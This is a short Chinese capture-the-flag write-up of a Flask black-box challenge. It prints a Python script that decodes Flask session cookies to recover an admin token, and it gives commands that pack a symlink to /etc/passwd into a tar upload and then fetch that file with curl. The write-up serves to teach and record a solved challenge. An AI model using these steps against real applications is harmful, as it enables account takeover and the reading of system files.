一道有关Flask的黑盒题目,通过解密获得token。可惜没有及时截图,现在只剩下文字了,凑合记录一下。
2019年3月7日11:18:30
-
注册账户测试发现有admin,后登陆发现发现有上传页面,但提示说管理员才可以上传tar包
-
通过在修改密码页面填写‘admin’,在响应cookie里找到admin的session,运用python3的解密脚本解出token,即可成功修改密码,需注意flask脚本有在python2,python3环境下运行结果不同,需要测试后运行。脚本如下:
#!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) decompress = False if payload.startswith(b'.'): payload = payload[1:] decompress = True try: payload = base64_decode(payload) except Exception as e: raise Exception('Could not base64 decode the payload because of ' 'an exception') if decompress: try: payload = zlib.decompress(payload) except Exception as e: raise Exception('Could not zlib decompress the payload before ' 'decoding the payload') return session_json_serializer.loads(payload) if __name__ == '__main__': print(decryption(sys.argv[1].encode())) -
构造带有软链接文件的tar包
ln -s /etc/passwd 1.jpg tar -cf 1.tar 1.jpg tar --help tar -cf archive.tar foo bar # Create archive.tar from files foo and bar. tar -tvf archive.tar # List all files in archive.tar verbosely. tar -xf archive.tar # Extract all files from archive.tar. -
curl xxx/download/1.jpg 获得/etc/passwd的信息,得到flag